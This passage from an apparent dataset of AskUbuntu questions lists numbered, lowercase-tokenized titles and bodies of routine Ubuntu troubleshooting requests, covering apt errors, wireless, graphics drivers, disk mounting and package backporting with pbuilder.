solution to this ? if you somebody is willing to help please explain everything in details because i am new quite new in ubuntu . thanks , giorgos
395483	where to find information sources about the apt system ?	the apt seems to have developed into a very comprehensive environment , hosting a multitude of command-line , and gui based tools . comprehensive information regarding the apt system , specially from the perspective of a system maintainer does not seem to be available from one single source , but rather seems to be scattered over man-pages , blogs and how-to 's . what is/are the most up to date and comprehensive sources of information on the apt system which allows the user to appreciate : the architecture of the repositories , mirrors and package distribution system and apt as a whole the workings/mechanisms of the above the legal , social / community & policy issues affecting the above ( i.e . the various repositories and release policies and restrictions ... etc. ) the various client tools available for leveraging apt 's facilities and capabilities for example are there any recent publications that might cover some , most or even all of the above . is there a new link or how-to to that effect ? of course once the above are understood the man pages become a very tool . perhaps the info simply > is < scattered over the man-pages , blogs and how-to 's and is n't organized under one roof ... ... in that case could any of the experienced apt gurus , point out those resources that are available , particularly pointing out which of the above points ( 1 to 4 ) are addressed by each resource ( to their best knowledge and judgement ) ? this might help to list and summarize all the info related to apt in one point ( i.e . the answers to this question ) and may benefit many of the forum users specially when it comes to maintaining and updating their ubuntu installations .
395484	how come when i view a website , like adobe or godaddy jolly wallet pops up ?	whenever i visit a website like adobe.com or godaddy i get a banner like this , adobe : godaddy :
395488	how to remove `` ubuntu help '' and `` about this computer '' from shutdown menu ? ( indicator-session applet )	i need to remove from shutdown menu : '' about this computer '' '' ubuntu help '' i 've been trying to figure out how , and i looked around on-line , but could n't find anything . thanks for your help .
395490	gcc can not find ansinist.h even though it is there in /usr/incude/ansinist	i am trying to make a program provided by nist . i do not have much experience in such tasks . i am getting the following error . util.c:19:22 : fatal error : ansinist.h : no such file or directory # include < ansinist.h > ansinist is available in the current directory , project base directory and i have also copied it to /usr/include/aninist but still getting this error .
395493	ubuntu 12.04 gets very slow after waking up from suspending or sleeping	basically after waking up from a time out or from manually suspending , it gets very slow , to the point that it is impossible to even open a terminal on tty1-6 . ( edit : i 'm referring to unity or gnome-shell ) could this have anything to do with swap memory ? my fstab is : proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=bd4585c8-a303-4ce8-87f1-42737c6e9fd4 / ext3 errors=remount-ro 0 1 # /boot was on /dev/sda8 during installation uuid=36573f57-835f-41a2-ad18-aaa2d397d7d3 /boot ext2 defaults 0 2 # /home was on /dev/sda9 during installation uuid=0bb5194c-2ece-4b4e-8f7e-34aa33bde7d0 /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation # uuid=15854d8c-22d7-4625-b596-5b126232455b none swap sw $ /dev/sda6 none swap sw 0 0 ( i commented line 9 because after installing ubuntu i installed debian in another partition and it apparently changed sda6 id , and i was getting a non fatal error on ubuntu startup . debian was then removed though , so swap partition is not being shared among operating systems ) .
395497	ubuntu 11.10 under vmware full-screen resolution problem	i am running ubuntu 11.10 under vmware 9.0 ( host on win 8 ) . i have installed vmware tools . when i log into ubuntu , sometimes screen resolution changes to appropriate settings without problem and sometimes it does not . when it does n't fit itself , the appropriate screen resolution ( 1600 * 900 16:9 ) is not in the display resolution lists and so i can not fit the screen manually . what is the problem ? update : i installed gnome desktop and when i login with gnome-desktop option , it is just fine .
395498	`` e : type ' < ! doctype ' is not known on line 1 in source list '' how to fix ?	i have recently installed playonlinux on my ubuntu 13.04 , but i am getting a system error : e : type ' < ! doctype ' is not known on line 1 in source list /etc/apt/sources.list.d /playonlinux.list please tell me how to fix it . here is the html file : < ! doctype html public `` -//w3c//dtd xhtml 1.0 transitional//en '' `` http : //www.w3.org /tr/xhtml1/dtd/xhtml1-transitional.dtd '' > < html > < head > < meta http-equiv= '' refresh '' content= '' 0 ; url=http : //airtelforum.com/main ? interceptsource=0 & clientlocation=in & participantid=kk7rp2jf3dkl4v52nla5u7676ej8r6uf & failuremode=1 & searchquery= & faileduri=http % 3a % 2f % 2fdeb.playonlinux_jaunty.list % 2f & addintype=4 & version=2.1.8-1.90base & referer= & implementation=0 '' / > < script type= '' text/javascript '' > url= '' http : //airtelforum.com/main ? interceptsource=0 & clientlocation=in & participantid=kk7rp2jf3dkl4v52nla5u7676ej8r6uf & failuremode=1 & searchquery= & faileduri=http % 3a % 2f % 2fdeb.playonlinux_jaunty.list % 2f & addintype=4 & version=2.1.8-1.90base & referer= & implementation=0 '' ; if ( top.location ! =location ) { var w=window , d=document , e=d.documentelement , b=d.body , x=w.innerwidth||e.clientwidth||b.clientw idth , y=w.innerheight||e.clientheight||b.clientheight ; url+= '' & w= '' +x+ '' & h= '' +y ; } window.location.replace ( url ) ; < /script > < /head > < body > < /body > < /html >
395499	can i get a free ubuntu cd ?	can any one help me get a free ubuntu installion disk in bangladesh ?
395504	i can not get new updates	pakettitietoja ei voitu alustaa pakettitietoja alustettaessa tapahtui virhe jota ei voitu korjata . ilmoita tästä virheraportilla paketille `` update-manager '' , ja sisällytä raporttiin seuraava virheviesti : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/fi.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : pakettiluettelonn tai tilatiedoston avaaminen tai jäsennys epäonnistui . english translation ( using google translate ) - package information could not be initialized initializing the package information an error occurred that could not be repaired . report this error report package `` update-manager '' , and include in the report the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/fi.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
395505	huawei usb modem e303 not working after installing java	huawei usb modem e303 not working after installing java ... i installed xtreme download manger and ubuntu installed java ... after that modem is n't detected.tried reinstalling usb-modeswitch , but it did n't work hereâs what dmesg says [ 2824.231057 ] usb 3-2 : new high-speed usb device number 4 using xhci_hcd [ 2824.247948 ] usb 3-2 : new usb device found , idvendor=12d1 , idproduct=14fe [ 2824.247956 ] usb 3-2 : new usb device strings : mfr=2 , product=1 , serialnumber=0 [ 2824.247962 ] usb 3-2 : product : huawei mobile [ 2824.247968 ] usb 3-2 : manufacturer : huawei [ 2824.300718 ] usb-storage 3-2:1.0 : usb mass storage device detected [ 2824.300827 ] scsi7 : usb-storage 3-2:1.0 [ 2824.300946 ] usb-storage 3-2:1.1 : usb mass storage device detected [ 2824.301022 ] scsi8 : usb-storage 3-2:1.1 [ 2824.301115 ] usbcore : registered new interface driver usb-storage [ 2825.300336 ] scsi 7:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 2825.300370 ] scsi 8:0:0:0 : direct-access huawei sd storage 2.31 pq : 0 ansi : 2 [ 2825.302688 ] sr1 : scsi-1 drive [ 2825.302959 ] sr 7:0:0:0 : attached scsi cd-rom sr1 [ 2825.304495 ] sr 7:0:0:0 : attached scsi generic sg3 type 5 [ 2825.310547 ] sd 8:0:0:0 : attached scsi generic sg4 type 0 [ 2825.311925 ] sd 8:0:0:0 : [ sdc ] attached scsi removable disk [ 2825.451576 ] iso 9660 extensions : microsoft joliet level 1 [ 2825.459956 ] isofs : changing to secondary root [ 3688.963776 ] systemd-hostnamed [ 6133 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname !
395506	install options/procedures and portability	i am very new with linux , but i can tell that i am happy with it . but against its main rival , windows , one can take an .exe or .msi put it on a usb/cd/dvd and take it everywhere , store it for future use etc . i want to be able to save programs for future use , mainly to store them somewhere and then take them elsewhere ( for example a machine that has no internet connectivity ) . from what i see if you want to install something you have to have firefox and/or apt protocols . is there a solution to my problem ? example : can i download , burn and install from a cd or usb with vlc or gimp and so on ?
395507	ubuntu start failed while using second monitor	ubuntu 13.04 laptop asus ux32vd if i connect monitor to my laptop ubuntu do not start properly . i see only black screen on both of displays . magic sysrq do not reboot laptop . i only can shutdown laptop using long pressing power button . here is syslog part , 11:14:53 time exactly before hot shutdown . i 'm connectiong using this adapter :
395512	not possible to install mate desktop	when trying to install mate desktop , after running command : sudo apt-get install mate-core i get a message that i have held broken packages . how can i solve the problem ? current answer in ubuntu is not solving the issue .
395516	fatal : could not create work tree dir 'metasploit-framework ' . : permission denied	i am following this guide . i am doing this : cd /opt git clone https : //github.com/rapid7/metasploit-framework.git cd metasploit-framework when i am doing : git clone https : //github.com/rapid7/metasploit-framework.git i am getting the following error : fatal : could not create work tree dir 'metasploit-framework ' . : permission denied
395518	changing duplex setting permanently in ubuntu 12.04 not working	i want to change my duplex setting to 10mbps full duplex in ubuntu 12.04 . the same is working fine for temporary change through ethtool eth0 cmd . but when i try to make a permanent change it is not working while i reboot system i am getting no network found and finally after certain try ubuntu starts without full network support and in which i can not connect to internet . below is the code i used for changing duplex speed and link which i followed for making changes a link ! to make it permanent added following lines to /etc/network/interfaces file sudo gedit /etc/network/interfaces add the following line pre-up /usr/sbin/ethtool -s $ iface autoneg off 10 duplex full save and exit the file you need to restart networking services using the following command sudo service network restart please advice
395520	netflix compositing issue	so i have an issue running netflix . it 's run slow and clunky so far , which is fine , i can do slow and clunky , gives me more time for popcorn . but lately , when i 've tried to start it up , i get an error , namely : compositing is not available , please enable compositing and restart netflix desktop . now , i 've seen a few other people with this problem , but none of the solutions that they 've tried have worked . i 've got no experimental drivers installed , and rm -rf ~/.netflix-desktop does nothing . would a more experienced brain mind looking in at this ?
395522	ubuntu mysql suddenly locked me out	i 'm experiencing a very weird problem here . i was using a mysql database for developing a rails app and everything was fine . then i rebooted the computer ( ubuntu 13.10 ) and found myself locked out of the database with this message : access denied for user 'root ' @ 'localhost ' ( using password : no ) both the rails app and the command line give me this message . i 've followed the instructions to reset the mysql root password but to no avail -- every time i stop mysqld ( whether via kill , /etc/init.d/ , or any other recommended method the process disappears for about 2 seconds only to reappear with a new pid . it 's almost as if a virus has taken over ( could that be ? ? ) . anyway i am hermetically sealed out of my mysql server . any ideas on what happened and what i could do about it ? edit : i know how to log into mysql via command line w/ a password . the problem is that i set no password during install and something set one for me , and i have no clue what it is .
395524	usb tethering with samsung galaxy ace ?	the network center does n't find a new wired connection when tethering is enabled . whether tethering is enabled or not , output of lsusb | grep samsung is same : bus 003 device 009 : id 04e8:681d samsung electronics co. , ltd galaxy portal/spica android phone ubuntu 13.10 ( updated ) , mobile phone : gt-s5830 , android 2.3.7 ( cyanogenmod-7.2.0-cooper ) . btw , the phone does n't automount as an android phone as well ( `` disks '' app shows samsung gt-s5830 card ( 0100 ) as dev/sdb , but `` no media '' ) . works normally in the usb mass storage mode . a galaxy sii on the same machine mounts/tethers with zero problems .
395525	not able to run ipython nbconvert	i have downloaded the ipython and ipython-notebook packages . the documentation of ipython says that i can run nbconvert to convert my notebooks to html/latex/etc . but am not able to run either nbconvert or ipython nbconvert . ~ ipython -- version 0.13.1.rc2 ~ ipython nbconvert [ terminalipythonapp ] file not found : u'nbconvert' ~ ( i do n't know if this is the correct site to ask this . )
395526	howto force user/password on mixed anonymous readonly / user read-write smb share	i 'm trying to force user credentials on a share samba share that can also be mounted anonymously in read-only mode . i 've tried using : gvfs-mount smb : //marc @ phi.local/photo with marc @ phi.local stored as inside my keystore ( seahorse ) . how can i do it ?
395527	how to remove ubuntu after wubi installation	i installed ubuntu through wubi . now i want to remove ubuntu . please help by step by step instructions . thanks
395534	how to install the latest version of a package	i have a problem with gnome-control-center . the bug was fixed with latest version https : //launchpad.net/ubuntu/saucy/amd64/gnome-control-center/1:3.6.3-0ubuntu45.1 ( my version is gnome-control-center/1:3.6.3-0ubuntu24 . ) but when i run apt to update my package it says that they are up to date . i got the same thing when i try with synaptic manager . what the problem ? thanks
395536	running an existing installation of windows 7 inside ubuntu ( 12.04 )	i have windows 7 and ubuntu 12.04 ( both 64-bit ) installed on my hard drive in separate partitions . i heard that it is possible to run an existing installation of windows inside ubuntu using a vm , but as i am new to the linux scene , i have n't been able to figure out a way . i have fallen in love with ubuntu , but there is a lot of windows only software i need to be able to use , so if anyone could help me run my existing windows installation in some form of vm player , i will be very grateful . if you need any more information ( or if i 'm just being a total noob without realising ) please let me know .
395537	wireless wo n't connect in ubuntu 13.10	i have now worked a while with ubuntu but still not really into it . however everything worked fine after the installation , now about after a weak i 'm getting issues with my wifi . in the beginning all worked as it should . but then it got slower and slower and even completely stopped sometimes , so that i had to reconnect to my network . but since yesterday i 'm not able to connect to my network at all . it just loads and loads and after a few minutes it says disconnected . now i tried to delete it and reconnect to it and when i enter the passcode for my network and i click ok it tries to connect , but after a minute or two the box appears again but with my passcode already entered . i am sure the passcode is right so my question : how can i get my wifi back to work ?
395539	sharing internet connection ( dhcp ) through a wireless hotspot	i have an internet connection through a cable modem . the ip address on the cable modem is not static and is perhaps obtained through a dhcp mode . i wish to share this internet connection through the wifi port available on my computer . interestingly , the ad-hoc network setting does not work for my case on ubuntu . therefore , i have set up my /etc/network/interfaces as follows : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 10.10.0.1 netmask 255.255.255.0 i am not clear with the process of routing , as i do not know the dhcp address until it is assigned i.e . only after i connect i will know the ip address of the system , and that ip address would be the one which the dhcp clients of my computer would use to route their internet connectivity . any clues on this ?
395540	need help installing steam with wine ( bug )	when i try to install steam with wine and winetricks , its only says : checksum for /home/viktor/.cache/winetricks/steam/steaminstall.msi did not match , retrying download and : sha1sum mismatch ! rename /home/viktor/.cache/winetricks/steam/steaminstall.msi and try again . and then it just closes down . how to fix this ?
395543	13.10 : how to set accelerator to select keyboard layout rather than switching to next/previous ?	there is a host of regressions related to switching keyboard layouts in 13.10 . one of them is that the dialogue lets one choose accelerators for selecting previous/next keyboard layout : previously , i was able to have accelerator for the first layout ( which was caps lock ) and for the second layout ( shift+caps lock ) rather than changing the layout with either of those combinations . someone knows a workaround for this ? ps : a workaround for the caps led indicating the layout is likewise appreciated .
395544	g++ : error : or : nosuch file or directory	somedays ago , i updated my system ( ubuntu-32bit 12.04 ) . since it was a general update and not an upgrade , i didnt suspect anything could go wrong . now my codeblocks ( 12.11 ) is giving me troubles . everytime i try to compile/run something on codeblocks i get an error in build messages saying : or no such file or directory === build finished : 1 errors , 0 warnings ( 0 minutes , 0 seconds ) === while i can normally execute all the programs using gcc on command line . ex : for this program : # include < stdio.h > int main ( ) { printf ( `` hello world ! \n '' ) ; return 0 ; } the various error logs i have are : code : :blocks : build log : compiling : /home/shagun/1.cpp g++ : error : or : no such file or directory process terminated with status 1 ( 0 minutes , 0 seconds ) 1 errors , 0 warnings ( 0 minutes , 0 seconds ) build messages saying : or no such file or directory === build finished : 1 errors , 0 warnings ( 0 minutes , 0 seconds ) === further at paste.ubuntu.com all the help i could find online was telling me how does # include `` '' differ from # include < > and i have followed the standard procedure of re installing codeblocks many times by now . any help will be appreciated .
395545	i ca n't access my session	i have a problem with the authentication page , it keeps sending me back , even if i have the correct password , i 've looked for the problem , but no solution worked for me . the .xauthority is the problem i guess , because it 's empty , the file is already the property of the user . p.s : if i enter ctrl +alt + f1 and login , everything is good , but if i try to execute startx it shows my wallpaper with no panels nor icons .
395546	hadoop fs command is not working in my system	i had install single cluster node on my personal laptop , it has successfully installed and jps also displaying all 5 demons but when i tried to enter into on top of hdfs by using hadoop fs command it shows command not found can any body please explain what is the problem and what we have to do to run hdfs commands ?
395549	`` e : malformed line 1 in source list /etc/apt/sources.list.d/medibuntu.list ( type ) , ''	i want to update ubuntu , but i see this message : e : malformed line 1 in source list /etc/apt/sources.list.d/medibuntu.list ( type ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . how can i solve this ?
395552	glibc_2.16 not found while installing utorrent server	i tried nrly everything to fix this problem , but i 'm a linux-noob so maybe it 's me who does something wrong . basicly i get this error_ sudo utserver -settingspath /opt/utorrent-server-alpha-v3_3/ utserver : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.16 ' not found ( required by utserver ) i tried to install build-essentiels and libssl0.9.8 but it still says glibc2.16 not found . what can i do to install glibc step-by-step to get utorrent server to work ? i 'm using ubuntu 12.04 thanks for the help and merry christmas everyone !
395557	no network controller for wifi on ubuntu 13.10	i seem to be so dumb when it comes to this , well recently my wifi connection was ok . when i did a restart it stopped giving me wireless connections . even the button on the left that should be lit up when i had wifi connection is no longer turning on . i tried running lshw -c network and it gave me this result : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 02 serial : 00:1e : ec : ce:25:23 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory:51410000-51410fff memory:51400000-5140ffff memory:51420000-5142ffff how can i fix this ? ( im only using a usb plug in internet thingy for now ) edit : after checking around , what i see that is weird is when i run the lshw -c network command it doesnt even give me a `` unclaimed '' and network controller result , only the ethernet cable result .
395558	mounting additional harddrive using ntfs-3g	i have desktop with 80gb hdd with ubuntu then i added a 2tb but failed to get it mounted tried all links from mounting ntfs on ubuntu search this is my current config : dell : ~ $ sudo blkid /dev/sda1 : uuid= '' 18692632-7315-41e4-87a6-6849a1632f8f '' type= '' ext4 '' /dev/sda5 : uuid= '' 96ce4c1c-79d4-44bd-9cef-7cd754cf7f32 '' type= '' swap '' /dev/sdb1 : uuid= '' 3515b80f1e432b77 '' type= '' ntfs '' /dev/sdb2 : type= '' swap '' /dev/sdb3 : uuid= '' a427c9ca-f16d-42fd-99ee-b114df2bf1b6 '' sec_type= '' ext2 '' type= '' ext3 '' this is my fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=18692632-7315-41e4-87a6-6849a1632f8f / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=96ce4c1c-79d4-44bd-9cef-7cd754cf7f32 none swap sw 0 0 # /dev/sdb1 /media/data ntfs-3g defaults , auto , users , rw , exec , locale=en_us.utf8 0 0 # /dev/sdb1 /media/data ntfs-3g uid=1000 , auto , users 0 0 when i run sudo mount -a i get dell : ~ $ sudo mount -a ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read ntfs $ bitmap : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . when i go through userinterface i get error mounting : mount exited with exit code 1 : helper failed with : mount is denied because setuid and setgid root ntfs-3g is insecure with the external fuse library . either remove the setuid/setgid bit from the binary or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged
395559	ubuntu 12.04 lts versus ubuntu 13.10	i 'm new to ubuntu and i 'm not sure which version to install . which offers better performance ? which would you recomend ? thanks in advance .
395560	how can i fix my full screen glitch ?	when i put a video in full screen and exit out the task bar and the top bar disappear . also if i switch tabs on my browser where i have a video playing then when i switch back it just becomes black until i reload . any help is appreciated . thank you for your help . sorry if this post if poorly written i am new to linux and askubuntu . specs : sony vaio vgn-cr120e ubuntu 13.10 chromium browser
395565	black screen after installing the ati driver	i 'm new to the linux world but decided to try ubuntu and so far i like it . but after installing the ati driver a weird thing occured . whenever i turn on my laptop , it starts normally up to the part where i can choose the os i 'd like to boot ( with purple background ) and when i hit enter to boot the ubuntu , it just beeps and stays black , nothing happens . i tried to find a solution but got nothing so far . when i boot in recovery mode ( root ) and try to purge the driver , 3 lines appear : w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . it 's like that will all commands i try . i 'd really like to use ubuntu and maybe at some point i 'll remove windows entirely but for now it 's just unusable . i have a request , if someone replies , please try to explain everything step by step since i 'm new to this . p.s . i am really sorry if there is already a post answering to this .
395570	problem getting 4k ( uhd ) output to sony 65 '' 4k tv xbr-65x900a	i think i have tried everything ... but hoping someone here can show me i have n't tried everything . i am unable to select or configure an output above 1080p on my ubuntu machine . i have tried latest linux intel graphics on 12.04 lts , then tried upgrading to 13.10 and also kernel 3.12 . i have also tried all manner of xrandr configuration without luck ( either tv says not supported or ubuntu chucks a spasm about crt1 `` no such interface '' ( when i am using hdmi ) . when i read the edid i do not get 4k information ( but this seems not just sony when i google this problem i am having with 4k output ) and read-edid says 1 more block was available but not decoded , possibly indicating a problem with the intel drivers . i am using intel i5 with hd4000 gpu and hdmi output . below is the hopefully all the relevant info : xrandr : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 1439mm x 809mm 1920x1080 60.0*+ 50.0 59.9 30.0 24.0 30.0 24.0 1920x1080i 60.1 50.0 60.0 1280x1024 60.0 1280x720 60.0 50.0 30.0 59.9 30.0 24.0 24.0 1440x576i 50.1 1024x768 60.0 1440x480i 60.1 60.1 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 dp2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) uname -a linux riker 3.12.0-031200-generic # 201311031935 smp mon nov 4 00:36:54 utc 2013 x86_64 x86_64 x86_64 gnu/linux lsb_release -a : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy lspci | grep vga : 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v2/3rd gen core processor graphics controller ( rev 09 ) get-edid : get-edid version 2.0.0 performing real mode vbe call interrupt 0x10 ax=0x4f00 bx=0x0 cx=0x0 function supported call successful vbe version 300 vbe string at 0x11100 `` intel ( r ) sandybridge/ivybridge graphics chipset accelerated vga bios '' vbe/ddc service about to be called report ddc capabilities performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x0 cx=0x0 function supported call successful monitor and video card combination does not support ddc1 transfers monitor and video card combination supports ddc2 transfers 0 seconds per 128 byte edid block transfer screen is not blanked during ddc transfer reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call successful edid claims 1 more blocks left *********** something special has happened ! please contact the author , matthew kern e-mail : pyrophobicman @ gmail.com please include full output from this program ( especially that to stderr ) reading next edid block vbe/ddc service about to be called read edid performing real mode vbe call interrupt 0x10 ax=0x4f15 bx=0x1 cx=0x0 function supported call successful edid claims 1 more blocks left edid blocks left is wrong . your edid is probably invalid . parse-edid : edid checksum passed . # edid version 1 revision 3 section `` monitor '' # block type : 2:0 3 : fc identifier `` sony tv *07 '' vendorname `` sny '' modelname `` sony tv *07 '' # block type : 2:0 3 : fc # block type : 2:0 3 : fd horizsync 14-70 vertrefresh 48-62 # max dot clock ( video bandwidth ) 150 mhz # dpms capabilities : active off : no suspend : no standby : no mode `` 1920x1080 '' # vfreq 60.000hz , hfreq 67.500khz dotclock 148.500000 htimings 1920 2008 2052 2200 vtimings 1080 1084 1089 1125 flags `` +hsync '' `` +vsync '' endmode mode `` 1280x720 '' # vfreq 60.000hz , hfreq 45.000khz dotclock 74.250000 htimings 1280 1390 1430 1650 vtimings 720 725 730 750 flags `` +hsync '' `` +vsync '' endmode # block type : 2:0 3 : fc # block type : 2:0 3 : fd endsection
395571	creative zii sound t6 volume low	i have recently installed the new ubuntu 13.10 , i have creative zii sound t6 wireless speakers . they are functioning however the volume level is not as it was before it sound much lower once on 100 % ( or even more from the settings panel ) .
395576	note app with android client , tree structure and encryption ? seems like there is n't one for linux ?	i 'm looking for note taking ( evernote like ) program that - has android client compatible with it 's db - offers tree structure and preview of the note in the same window ( tomboy would have been perfect if it was n't for the fact that you have to click to view each note ) - offers some kind of whole db of separate note encryption , that 's a plus i 'm searching for the past 2 days and seems like there is no such thing for linux ?
395578	ca n't find the deployed application in list applications in tomcat 6	i have deployed two war files for java sesame : openrdf-sesame.war and openrdf-workbench.war and found them on the list applications in the tomcat web application manager . when i restarted the tomcat 6 on terminal , i could not find them on the list applications . i tried to deploy them again , it shows me the following message : fail - war file `` openrdf-sesame.war '' already exists on server when i go to the apache-tomcat-6.0.37 , i find them under the folder webapps but canât find them in the list applications . could anyone please guide what i should do at this point ? why can i not find these two folders on the list applications anymore ? how can i get them back ?
395579	can i connect to running autostart python script ?	i am running lubuntu 13.10 an have a python script that is run on boot through ~/.config/lxsession/lubuntu/autostart . the script startes a web application and outputs various information to terminal output . i have made some changes now to the python script and wish to restart it , and keep it running in background . is it possible to connect/attach to the running python script through terminal so that i can see the scripts output ? i tried reptyr but i get an error indicating it is a subprocess . or , is this not possible and the only option to kill the process manually and than restart it through another terminal ? of course , on next boot the changes will take effect , but it is nice to know whether i can interact with running processes . thanks for your help .
395583	ssd not found in the bios boot order when an hdd is present	thank you for reading my question , but thank you even more for answering ! my setup is as followed : an acer laptop using an ssd with ubuntu installed in the deticated `` hdd '' sata slot , and a hdd with windows installed in the optical sata slot ( i 've removed the dvd drive ) . when booting the system i 've got two option in post : ( f2 ) bios configurations/boot order . ( f12 ) select a device to boot , either my hdd ( windows 7 ) or my ssd ( ubuntu 13.10 ) . when pressing f2 i can change the boot order , but only one of the storage devices shows up the hdd ( under the name `` hdd0 : st950032 ... '' ) . the result is a system that always boots the hdd ( windows ) unless said otherwise , when my goal was to have it the other way around . so my the question is : how can i select the ssd in the boot order list ? ( or another fancy solution will do also ) additional info : the ssd is a samsung 840 evo 120gb when removing the hdd , the ssd shows up again and boots it . it seems that the ssd is in sata port 0 and the hdd is in sata port 2 this post descibed a very similar problem but its not the same , my drives both contain their own os and nothing more .
395584	how to build a newer version of a package than is available for my stable release ?	i want to use a newer package version with my stable ubuntu release . asking for backport takes too long without visible result , so i thought that maybe i can build newer version myself . can anybody tell me what is the current best practices to build newer versions of packages that are already available on ubuntu ? update : i found out that i need pbuilder to keep my system clean from build dependencies . so i 've done : sudo apt-get install pbuilder sudo pbuilder create # create isolated environment for building packages upd2 : i tried to check if i can build current version , so i fetched source code for the current < version > of my < package > : mkdir delme cd delme apt-get source < package > upd3 : now i tried build package from source , but can not find the results : sudo pbuilder build *.dsc the log says : ... 0 packages upgraded , 94 newly installed , 0 to remove and 0 not upgraded . need to get 30.2 mb of archives . after unpacking 89.4 mb will be used . the following packages have unmet dependencies : pbuilder-satisfydepends-dummy : depends : libjansson-dev which is a virtual package . depends : libudev-dev but it is not going to be installed . depends : ocl-icd-opencl-dev which is a virtual package . or opencl-dev which is a virtual package . unable to resolve dependencies ! giving up ... the following new packages will be installed : ... need to get 30.2 mb of archives . after unpacking 89.4 mb will be used . abort . e : pbuilder-satisfydepends failed . i : copying back the cached apt archive contents ... upd4 : it appeared that these unmet dependencies are from universe package repository , so i had to enable it : sudo pbuilder update -- components `` main universe '' -- override-config without -- override-config pbuilder will complain that it is not set . everything is built successfully : ls -la /var/cache/pbuilder/result/ up5 : found out which package versions are available and fetched the source for the needed one : uscan -- report -- verbose uscan -- download-version < version > up6 : found uupdate utility and used that to create directory for new package and update debian/changelog , which is needed to produce new version : cd < package > - < old-version > uupdate ../ < package > _ < version > .orig.tar.gz cd ../ < package > - < version > vim debian/changelog up7 : to build source with pbuilder i need to generate .dsc file . it is usually done with debuild -s command , or with pdebuild -s in `pbuilder . pdebuild -s this errors out : ... fakeroot debian/rules clean dh clean -- with autoreconf dh : unable to load addon autoreconf : .. begin failed -- compilation aborted at ( eval 19 ) line 2. make : *** [ clean ] error 2 dpkg-buildpackage : error : fakeroot debian/rules clean gave error exit status 2 looks like there is no autoreconf package , but pbiulder is supposed to fetch it automatically , and seems like it uses .dsc file to do so . catch22 . upd8 : the command to build .dsc file is dpkg-source . cd .. dpkg-source -b < package > - < version > now it is possible to run pbuilder over it . sudo pbuilder build < package > _ < version > .dsc ls -la /var/cache/pbuilder/result/ up9 : uploading to ppa is as simple as running : dput ppa : techtonik/backports /var/cache/pbuilder/result/ < package > _ < version > .changes but it does n't work : checking signature on .changes gpg : no valid openpgp data found . gpg : the signature could not be verified . ... no signature on /var/cache/pbuilder/result/ < package > _ < version > .changes up10 : i do n't remember how did i generated gpg key , but i have one . found a way to sign the packages . edited maintaner : field in .dsc file and used debsign . sudo vim /var/cache/pbuilder/result/ < package > _ < version > .dsc sudo debsign /var/cache/pbuilder/result/ < package > _ < version > .changes attempt to upload failed : error : uploading files for distribution unreleased to ppa not allowed . up11 : redone everything from step 6 . how could i know that i need to edit debian/changes to replace unreleased with saucy and set my email in maintainer : field of debian/control ? vim < package > - < version > /debian/changelog vim < package > - < version > /debian/control dpkg-source -b < package > - < version > sudo pbuilder build < package > _ < version > .dsc sudo debsign /var/cache/pbuilder/result/ < package > _ < version > .changes sudo dput ppa : techtonik/backports /var/cache/pbuilder/result/ < package > _ < version > .changes upd12 : i still ca n't upload to ppa . first it was unable to find distroseries : unstable , because i specified unstable instead of saucy as unreleased replacement . after repeated step 11 it complained with already uploaded to ... which was healed with -f key to dput . now there is a mail that upload is rejected , because source/binary ( i.e . mixed ) uploads are not allowed . somewhere on the new it is said that i needed to build my package with debuild -s , but i do n't know how to tell that to pbuilder . upd14 : it appeared that the culprit is dh-autoreconf package , which is required for the cleaning source before the build , but both pbuilder and debuild miss this fact and unable to recover . installing dh-autoreconf on the host system allowed to build source package , sign and upload it even without pbuilder build . cd < package 